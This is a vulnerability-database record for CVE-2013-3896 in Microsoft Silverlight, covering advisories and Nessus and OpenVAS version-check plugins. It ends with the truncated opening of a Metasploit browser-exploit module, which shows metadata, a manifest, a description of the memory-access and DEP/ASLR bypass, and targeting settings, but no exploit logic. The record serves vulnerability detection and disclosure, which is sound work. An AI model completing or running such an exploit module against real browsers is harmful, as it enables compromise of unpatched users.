["MSF:EXPLOIT/WINDOWS/BROWSER/MS13_022_SILVERLIGHT_SCRIPT_OBJECT"], "type": "metasploit"}, {"idList": ["EDB-ID:41702"], "type": "exploitdb"}, {"idList": ["CVE-2013-3896"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310901223", "OPENVAS:1361412562310901224"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:29990", "SECURITYVULNS:VULN:13337"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:124182"], "type": "packetstorm"}, {"idList": ["SMB_NT_MS13-087.NASL"], "type": "nessus"}, {"idList": ["SMNTC-62793"], "type": "symantec"}, {"idList": ["THN:BC65D2F30C85103414F6BD1EC204BB05"], "type": "thn"}, {"idList": ["1337DAY-ID-21573", "1337DAY-ID-27390"], "type": "zdt"}]}, "score": {"modified": "2019-10-28T20:40:23", "value": 5.5, "vector": "NONE"}}, "hash": "a28edc3085151f5a364c2f9a31ca15b43e2e824b699f6fe64c425ec8c737b48e", "hashmap": [{"hash": "4aa086755d85a36695b8e69affb42aab", "key": "sourceData"}, {"hash": "8c6af3a225f1659f2a6f41054e5bb0b9", "key": "cvelist"}, {"hash": "3f5e7d93403e9b36b59d451ba342d40d", "key": "pluginID"}, {"hash": "7a954166b9da83bd6711dc28a5796f3d", "key": "published"}, {"hash": "4aee0b8c735f55de97f736b7e3a5e06f", "key": "references"}, {"hash": "d880aa9ca269f9122c9e15f6a5258772", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "dcd3bd068355e28e45dd51296438dbd3", "key": "description"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "4b99df98eaef4ec8988cc0454a083815", "key": "title"}, {"hash": "876f47c4ebc2b9e0dd17afaa22819f2a", "key": "cvss"}, {"hash": "528cea5b87bf77107bd9f05291bbffe5", "key": "reporter"}, {"hash": "34957b93e2c830455abbb48aaec64bb5", "key": "href"}, {"hash": "9415f91090c2218ae67dd519ff399983", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/70341", "id": "MACOSX_MS13-087.NASL", "lastseen": "2019-10-28T20:40:23", "modified": "2019-10-02T00:00:00", "naslFamily": "MacOS X Local Security Checks", "objectVersion": "1.3", "pluginID": "70341", "published": "2013-10-09T00:00:00", "references": ["http://technet.microsoft.com/en-us/security/bulletin/ms13-087"], "reporter": "This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70341);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2013-3896\");\n script_bugtraq_id(62793);\n script_xref(name:\"MSFT\", value:\"MS13-087\");\n script_xref(name:\"MSKB\", value:\"2890788\");\n\n script_name(english:\"MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)\");\n script_summary(english:\"Checks version of Microsoft Silverlight\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A multimedia application framework installed on the remote Mac OS X\nhost is affected by an information disclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host is\nreportedly affected by an information disclosure vulnerability due to\nits failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to disclose information from the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-087\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a patch for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_silverlight_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Silverlight/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nkb_base = \"MacOSX/Silverlight\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\n\n\nbulletin = \"MS13-087\";\nkb = \"2890788\";\n\nfixed_version = \"5.1.20913.0\";\nif (version =~ \"^5\\.\" && ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n if (defined_func(\"report_xml_tag\")) report_xml_tag(tag:bulletin, value:kb);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : '+fixed_version +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The Microsoft Silverlight \"+version+\" install is not reported to be affected.\");\n", "title": "MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)", "type": "nessus", "viewCount": 3}, "differentElements": ["modified"], "edition": 9, "lastseen": "2019-10-28T20:40:23"}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "d880aa9ca269f9122c9e15f6a5258772"}, {"key": "cvelist", "hash": "8c6af3a225f1659f2a6f41054e5bb0b9"}, {"key": "cvss", "hash": "876f47c4ebc2b9e0dd17afaa22819f2a"}, {"key": "description", "hash": "dcd3bd068355e28e45dd51296438dbd3"}, {"key": "href", "hash": "34957b93e2c830455abbb48aaec64bb5"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "9415f91090c2218ae67dd519ff399983"}, {"key": "pluginID", "hash": "3f5e7d93403e9b36b59d451ba342d40d"}, {"key": "published", "hash": "7a954166b9da83bd6711dc28a5796f3d"}, {"key": "references", "hash": "4aee0b8c735f55de97f736b7e3a5e06f"}, {"key": "reporter", "hash": "528cea5b87bf77107bd9f05291bbffe5"}, {"key": "sourceData", "hash": "4aa086755d85a36695b8e69affb42aab"}, {"key": "title", "hash": "4b99df98eaef4ec8988cc0454a083815"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "ec0c79f012d8d46b2c0a705c2d7016e4c43a971af66987cdbf746a87ec8211a7", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3896"]}, {"type": "symantec", "idList": ["SMNTC-62793"]}, {"type": "nessus", "idList": ["SMB_NT_MS13-087.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310901223", "OPENVAS:1361412562310901224"]}, {"type": "exploitdb", "idList": ["EDB-ID:41702"]}, {"type": "zdt", "idList": ["1337DAY-ID-21573", "1337DAY-ID-27390"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:124182"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13337", "SECURITYVULNS:DOC:29990"]}, {"type": "thn", "idList": ["THN:BC65D2F30C85103414F6BD1EC204BB05"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS13_022_SILVERLIGHT_SCRIPT_OBJECT"]}], "modified": "2019-11-01T02:54:23"}, "score": {"value": 5.5, "vector": "NONE", "modified": "2019-11-01T02:54:23"}, "vulnersScore": 5.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70341);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2013-3896\");\n script_bugtraq_id(62793);\n script_xref(name:\"MSFT\", value:\"MS13-087\");\n script_xref(name:\"MSKB\", value:\"2890788\");\n\n script_name(english:\"MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) (Mac OS X)\");\n script_summary(english:\"Checks version of Microsoft Silverlight\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A multimedia application framework installed on the remote Mac OS X\nhost is affected by an information disclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host is\nreportedly affected by an information disclosure vulnerability due to\nits failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to disclose information from the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms13-087\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a patch for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_silverlight_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Silverlight/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nkb_base = \"MacOSX/Silverlight\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\n\n\nbulletin = \"MS13-087\";\nkb = \"2890788\";\n\nfixed_version = \"5.1.20913.0\";\nif (version =~ \"^5\\.\" && ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n if (defined_func(\"report_xml_tag\")) report_xml_tag(tag:bulletin, value:kb);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : '+fixed_version +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The Microsoft Silverlight \"+version+\" install is not reported to be affected.\");\n", "naslFamily": "MacOS X Local Security Checks", "pluginID": "70341", "cpe": ["cpe:/a:microsoft:silverlight"], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "Microsoft Silverlight 5 before 5.1.20913.0 does not properly validate pointers during access to Silverlight elements, which allows remote attackers to obtain sensitive information via a crafted Silverlight application, aka \"Silverlight Vulnerability.\"", "modified": "2018-10-12T22:05:00", "id": "CVE-2013-3896", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3896", "published": "2013-10-09T14:53:00", "title": "CVE-2013-3896", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "symantec": [{"lastseen": "2018-03-13T12:08:04", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Silverlight is prone to an information-disclosure vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a malicious webpage. Successful exploits will allow attackers to gain access to potentially sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Silverlight 5.0 \n * Microsoft Silverlight 5.0.61118.0 \n * Microsoft Silverlight 5.1.10411.0 \n * Microsoft Silverlight 5.1.20125.0 \n * Microsoft Silverlight 5.1.20513.0 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nWhen possible, run all software as a user with minimal privileges and limited access to system resources. Use additional precautions such as restrictive environments to insulate software that may potentially handle malicious content.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2013-10-08T00:00:00", "published": "2013-10-08T00:00:00", "id": "SMNTC-62793", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/62793", "type": "symantec", "title": "Microsoft Silverlight CVE-2013-3896 Information Disclosure Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2019-11-03T12:15:47", "bulletinFamily": "scanner", "description": "The version of Microsoft Silverlight installed on the remote host\nreportedly is affected by an information disclosure vulnerability due to\nits failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to disclose information from the affected\nsystem, subject to the user", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS13-087.NASL", "href": "https://www.tenable.com/plugins/nessus/70339", "published": "2013-10-09T00:00:00", "title": "MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(70339);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2013-3896\");\n script_bugtraq_id(62793);\n script_xref(name:\"MSFT\", value:\"MS13-087\");\n script_xref(name:\"MSKB\", value:\"2890788\");\n\n script_name(english:\"MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788)\");\n script_summary(english:\"Checks version of Silverlight.exe\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A browser enhancement on the remote Windows host is affected by an\ninformation disclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Microsoft Silverlight installed on the remote host\nreportedly is affected by an information disclosure vulnerability due to\nits failure to properly handle certain objects in memory.\n\nIf an attacker could trick a user on the affected system into visiting a\nwebsite hosting a malicious Silverlight application, the attacker could\nleverage this vulnerability to disclose information from the affected\nsystem, subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-087\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"silverlight_detect.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-087';\nkb = \"2890788\";\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\n# Silverlight 5.x\nver = get_kb_item(\"SMB/Silverlight/Version\");\nif (isnull(ver)) audit(AUDIT_NOT_INST, \"Silverlight\");\nif (ver !~ \"^5\\.\") audit(AUDIT_NOT_INST, \"Silverlight 5\");\n\nfix = \"5.1.20913.0\";\nif (ver_compare(ver:ver, fix:fix) == -1)\n{\n path = get_kb_item(\"SMB/Silverlight/Path\");\n if (isnull(path)) path = 'n/a';\n\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n hotfix_add_report(report, bulletin:bulletin, kb:kb);\n\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:38:28", "bulletinFamily": "scanner", "description": "This host is missing an important security update according to\n Microsoft Bulletin MS13-087.", "modified": "2019-05-21T00:00:00", "published": "2013-10-09T00:00:00", "id": "OPENVAS:1361412562310901223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310901223", "title": "Microsoft Silverlight Information Disclosure Vulnerability (2890788)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Silverlight Information Disclosure Vulnerability (2890788)\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:silverlight\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.901223\");\n script_version(\"2019-05-21T06:50:08+0000\");\n script_cve_id(\"CVE-2013-3896\");\n script_bugtraq_id(62793);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-21 06:50:08 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-10-09 11:03:47 +0530 (Wed, 09 Oct 2013)\");\n script_name(\"Microsoft Silverlight Information Disclosure Vulnerability (2890788)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security update according to\n Microsoft Bulletin MS13-087.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"insight\", value:\"Flaw is caused when Silverlight improperly handles certain objects in\n memory.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Silverlight version 5 on Windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to obtain potentially\n sensitive information.\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/55149\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2890788\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/security/bulletin/ms13-087\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_silverlight_detect.nasl\");\n script_mandatory_keys(\"Microsoft/Silverlight/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!msl_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(msl_ver=~ \"^5\\.\")\n{\n if(version_in_range(version:msl_ver, test_version:\"5.0\", test_version2:\"5.1.20912.0\"))\n {\n report = 'Silverlight version: ' + msl_ver + '\\n' +\n 'Vulnerable range: 5.0 - 5.1.20912.0' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:49", "bulletinFamily": "scanner", "description": "This host is missing an important security update according to\n Microsoft Bulletin MS13-087.", "modified": "2019-05-21T00:00:00", "published": "2013-10-09T00:00:00", "id": "OPENVAS:1361412562310901224", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310901224", "title": "Microsoft Silverlight Information Disclosure Vulnerability-2890788 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Silverlight Information Disclosure Vulnerability-2890788 (Mac OS X)\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:silverlight\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.901224\");\n script_version(\"2019-05-21T06:50:08+0000\");\n script_cve_id(\"CVE-2013-3896\");\n script_bugtraq_id(62793);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-21 06:50:08 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-10-09 12:56:06 +0530 (Wed, 09 Oct 2013)\");\n script_name(\"Microsoft Silverlight Information Disclosure Vulnerability-2890788 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security update according to\n Microsoft Bulletin MS13-087.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Download and install the hotfixes from the referenced advisory.\");\n\n script_tag(name:\"insight\", value:\"Flaw is caused when Silverlight improperly handles certain objects in\n memory.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Silverlight version 5 on Mac OS X\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to obtain potentially\n sensitive information.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/55149\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2890788\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/security/bulletin/ms13-087\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gb_ms_silverlight_detect_macosx.nasl\");\n script_mandatory_keys(\"MS/Silverlight/MacOSX/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!msl_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(msl_ver=~ \"^5\\.\")\n{\n if(version_in_range(version:msl_ver, test_version:\"5.0\", test_version2:\"5.1.20912.0\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2017-03-23T13:17:06", "bulletinFamily": "exploit", "description": "Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022) (Metasploit). CVE-2013-3896. Local exploit for Windows platform", "modified": "2017-03-23T00:00:00", "published": "2017-03-23T00:00:00", "id": "EDB-ID:41702", "href": "https://www.exploit-db.com/exploits/41702/", "type": "exploitdb", "title": "Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022) (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'PACKETSTORM', '123731' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE,\r\n :silverlight => \"true\"\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86/x64', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def 